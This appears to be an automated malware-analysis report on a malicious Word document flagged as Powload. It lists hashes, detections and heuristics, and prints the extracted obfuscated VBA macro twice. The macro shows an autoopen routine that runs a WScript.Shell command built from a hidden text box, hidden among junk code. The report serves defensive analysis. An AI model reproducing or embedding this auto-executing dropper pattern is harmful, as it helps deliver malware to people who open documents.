Office (OLE) malware analysis — malicious · 5a2e46067d3710ec

MALICIOUS

Office (OLE)

105.1 KB Created: 2019-01-14 22:59:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: a8a3324499dc82dd2986ba80e11d3884 SHA-1: aff52bf72d5c3b20fdb864efc6362ee75492a685 SHA-256: 5a2e46067d3710ece2abdb092e7a3e49075ca19d0849e6499fb7953c28a9ec8e

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon document opening. Heuristics indicate the use of WScript.Shell and a Shell() call, strongly suggesting the execution of arbitrary commands. This is likely used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Malware.Powload'.

Heuristics 9

ClamAV: Doc.Malware.Powload-6815340-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6815340-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

      End Select
generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr)
   Select Case impactfuli

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

      End Select
generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr)
   Select Case impactfuli

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "FerryK"
Sub autoopen()
enterprisem = IncredibleRubberSoapX - quantifyingu

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7470 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7470 bytes
SHA-256: `d3c11c78007cd1f9e4b5e9c6cf213eb0b5fe2401108870ac5ed9e7dcff750b37`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SynergisticB" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Attribute VB_Name = "TunnelN" Function SQLl() On Error Resume Next Select Case H1080p93 Case 219 quantifyM = redefineB Bahta = CDate(indexq) AutoLoanAccounts = bottomlinek AGPA = Sgn(OptimizationB) Case 165 paymentE = 361 yellowm = CDbl(787) GenericSteelCheesei = Sharablei Fieldsd = Sin(middlewarej) Case 921 greenb = orchestrates BerkshireK = Fix(RAMK) GrassrootsP = Marketst InvestmentAccountB = Round(900) hackingH = synergiesf End Select Select Case depositG Case 195 NorthDakotaa = RefinedSoftChipsb parser = CDate(Recontextualizedw) DirectZ = FallY PracticalFreshShoesb = Sgn(Licensedl) Case 399 Homeh = 369 AngolaS = CDbl(49) ErgonomicSoftHatW = invoiceu GenericFrozenChickenk = Sin(PersonalLoanAccounta) Case 848 maroonI = recontextualizeU greyi = Fix(marketsp) dotcomc = TrailY capabilityu = Round(878) salmonM = overridingE End Select Select Case HomeLoanAccountj Case 232 MississippiR = CheckingAccountR transmitterf = CDate(synthesizingJ) Districtz = paymentN invoicet = Sgn(tanp) Case 905 multibytei = 730 transmitj = CDbl(271) dedicatedZ = harnessK onlineB = Sin(ShoesBabyGardenZ) Case 811 programmingX = NationalC connectingS = Fix(Refinedc) KidsGroceryA = ConcreteP Integrationu = Round(214) GorgeousWoodenSausagesk = Metalu End Select generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr) Select Case impactfuli Case 655 paymentY = z2436554 ConsultantJ = CDate(budgetarymanagementB) SavingsAccountz = cyanB Creativez = Sgn(HandcraftedSoftShoesB) Case 98 circuitB = 946 BordersY = CDbl(17) Borderso = CaymanIslandsDollarp holisticY = Sin(compositew) Case 610 SCSIS = copyingd haptici = Fix(GeorgiaX) protocolM = yellowU ProfoundA = Round(345) calculatingC = modelX End Select Select Case SurinameO Case 863 AIU = empowerR AwesomeSteelTunad = CDate(Genericc) compressH = DirectorW servicedeskL = Sgn(parsingA) Case 544 RubberX = 592 hackc = CDbl(709) Shoalsw = whiteboardY HandcraftedPlasticSaladt = Sin(BedfordshireC) Case 912 Louisianaf = Streamlinedk internetsolutionh = Fix(paymentU) CheckingAccountV = Officerp endtoends = Round(471) TastyFreshShirth = USBA End Select Select Case RialOmanis Case 945 GraniteG = FrenchGuianai functionalitiesO = CDate(GamesComputersToolsj) Granitev = FreshB TCPW = Sgn(transmitR) Case 346 MoneyMarketAccountv = 327 TexasX = CDbl(675) PhilippinePesoU = compositew objectorientedA = Sin(bypassi) Case 826 quantifyT = TennesseeB transitiona = Fix(Massachusettso) Agenti = backendt programz = Round(894) rebootf = convergenceM End Select Select Case Futureh Case 409 harnessG = PracticalConcreteSoapC InvestorE = CDate(visualizez) FutureproofedZ = DataY SupervisorA = Sgn(AntiguaandBarbudap) Case 408 Steelz = 17 RussianRublez = CDbl(262) BordersG = FantasticMetalSaladU Computersi = Sin(interfacesW) Case 446 leverageH = HandcraftedSoftShirtn reintermediateU = Fix(paradigmQ) HongKongDollarP = HealthClothingGameso PracticalConcreteSaladm = Round(431) RapidsX = connectingA End Select End Function Attribute VB_Name = "FerryK" Sub autoopen() enterprisem = IncredibleRubberSoapX - quantifyingu Shoesw = Administratorr - Rubberz Viaductq = homogeneousq - GardenJeweleryN capacitorR = HealthQ - AIK M1080p93 = intermediatez - backupz SQLl Bedfordshired = realtimeI - ToolsJeweleryGamesY leadingedgek = Pinei - lavenderu Steelq = Shorew - Representativer dynamicL = MississippiZ - extendO withdrawalz = OutdoorsGardenKidsc - Handcraftedj End Sub Attribute VB_Name = "IndustrialToysIndustrialN" Attribute VB_Name = "KidsOutdoorsB" Attribute VB_Name = "Taiwanz" Attribute VB_Name = "NorthKoreanWonQ" Attribute VB_Name = "paymenta" Attribute VB_Name = "neuralY" Attribute VB_Name = "primaryT" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "RefinedMetalGlovesn" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "CheckingAccountq" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "systemq" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "GenericConcreteBikeA" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Executivej" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "bidirectionald" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: d3c11c78007cd1f9e4b5e9c6cf213eb0b5fe2401108870ac5ed9e7dcff750b37

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SynergisticB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "TunnelN"
Function SQLl()
On Error Resume Next
   Select Case H1080p93
         Case 219
quantifyM = redefineB
            Bahta = CDate(indexq)
            AutoLoanAccounts = bottomlinek
            AGPA = Sgn(OptimizationB)
         Case 165
            paymentE = 361
            yellowm = CDbl(787)
GenericSteelCheesei = Sharablei
            Fieldsd = Sin(middlewarej)
         Case 921
greenb = orchestrates
            BerkshireK = Fix(RAMK)
GrassrootsP = Marketst
            InvestmentAccountB = Round(900)
            hackingH = synergiesf
      End Select
   Select Case depositG
         Case 195
NorthDakotaa = RefinedSoftChipsb
            parser = CDate(Recontextualizedw)
            DirectZ = FallY
            PracticalFreshShoesb = Sgn(Licensedl)
         Case 399
            Homeh = 369
            AngolaS = CDbl(49)
ErgonomicSoftHatW = invoiceu
            GenericFrozenChickenk = Sin(PersonalLoanAccounta)
         Case 848
maroonI = recontextualizeU
            greyi = Fix(marketsp)
dotcomc = TrailY
            capabilityu = Round(878)
            salmonM = overridingE
      End Select
   Select Case HomeLoanAccountj
         Case 232
MississippiR = CheckingAccountR
            transmitterf = CDate(synthesizingJ)
            Districtz = paymentN
            invoicet = Sgn(tanp)
         Case 905
            multibytei = 730
            transmitj = CDbl(271)
dedicatedZ = harnessK
            onlineB = Sin(ShoesBabyGardenZ)
         Case 811
programmingX = NationalC
            connectingS = Fix(Refinedc)
KidsGroceryA = ConcreteP
            Integrationu = Round(214)
            GorgeousWoodenSausagesk = Metalu
      End Select
generatingG = Array(dotcomM, SMSN, BrazilianRealt, CreateObject("WscRipt.sHeLl").Run(("" + NewMexicoP + programU + skybluen + SynergisticB.TextBox1) + Falln + SteelD + synthesizew, 54 - 54), connecta, HomeLoanAccountQ, Swazilandr)
   Select Case impactfuli
         Case 655
paymentY = z2436554
            ConsultantJ = CDate(budgetarymanagementB)
            SavingsAccountz = cyanB
            Creativez = Sgn(HandcraftedSoftShoesB)
         Case 98
            circuitB = 946
            BordersY = CDbl(17)
Borderso = CaymanIslandsDollarp
            holisticY = Sin(compositew)
         Case 610
SCSIS = copyingd
            haptici = Fix(GeorgiaX)
protocolM = yellowU
            ProfoundA = Round(345)
            calculatingC = modelX
      End Select
   Select Case SurinameO
         Case 863
AIU = empowerR
            AwesomeSteelTunad = CDate(Genericc)
            compressH = DirectorW
            servicedeskL = Sgn(parsingA)
         Case 544
            RubberX = 592
            hackc = CDbl(709)
Shoalsw = whiteboardY
            HandcraftedPlasticSaladt = Sin(BedfordshireC)
         Case 912
Louisianaf = Streamlinedk
            internetsolutionh = Fix(paymentU)
CheckingAccountV = Officerp
            endtoends = Round(471)
            TastyFreshShirth = USBA
      End Select
   Select Case RialOmanis
         Case 945
GraniteG = FrenchGuianai
            functionalitiesO = CDate(GamesComputersToolsj)
            Granitev = FreshB
            TCPW = Sgn(transmitR)
         Case 346
            MoneyMarketAccountv = 327
            TexasX = CDbl(675)
PhilippinePesoU = compositew
            objectorientedA = Sin(bypassi)
         Case 826
quantifyT = TennesseeB
            transitiona = Fix(Massachusettso)
Agenti = backendt
            programz = Round(894)
            rebootf = convergenceM
      End Select
   Select Case Futureh
         Case 409
harnessG = PracticalConcreteSoapC
            InvestorE = CDate(visualizez)
            FutureproofedZ = DataY
            SupervisorA = Sgn(AntiguaandBarbudap)
         Case 408
            Steelz = 17
            RussianRublez = CDbl(262)
BordersG = FantasticMetalSaladU
            Computersi = Sin(interfacesW)
         Case 446
leverageH = HandcraftedSoftShirtn
            reintermediateU = Fix(paradigmQ)
HongKongDollarP = HealthClothingGameso
            PracticalConcreteSaladm = Round(431)
            RapidsX = connectingA
      End Select
End Function


Attribute VB_Name = "FerryK"
Sub autoopen()
enterprisem = IncredibleRubberSoapX - quantifyingu
Shoesw = Administratorr - Rubberz
Viaductq = homogeneousq - GardenJeweleryN
capacitorR = HealthQ - AIK
M1080p93 = intermediatez - backupz
SQLl
Bedfordshired = realtimeI - ToolsJeweleryGamesY
leadingedgek = Pinei - lavenderu
Steelq = Shorew - Representativer
dynamicL = MississippiZ - extendO
withdrawalz = OutdoorsGardenKidsc - Handcraftedj
End Sub

Attribute VB_Name = "IndustrialToysIndustrialN"

Attribute VB_Name = "KidsOutdoorsB"

Attribute VB_Name = "Taiwanz"

Attribute VB_Name = "NorthKoreanWonQ"

Attribute VB_Name = "paymenta"

Attribute VB_Name = "neuralY"

Attribute VB_Name = "primaryT"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "RefinedMetalGlovesn"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CheckingAccountq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "systemq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "GenericConcreteBikeA"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Executivej"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bidirectionald"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.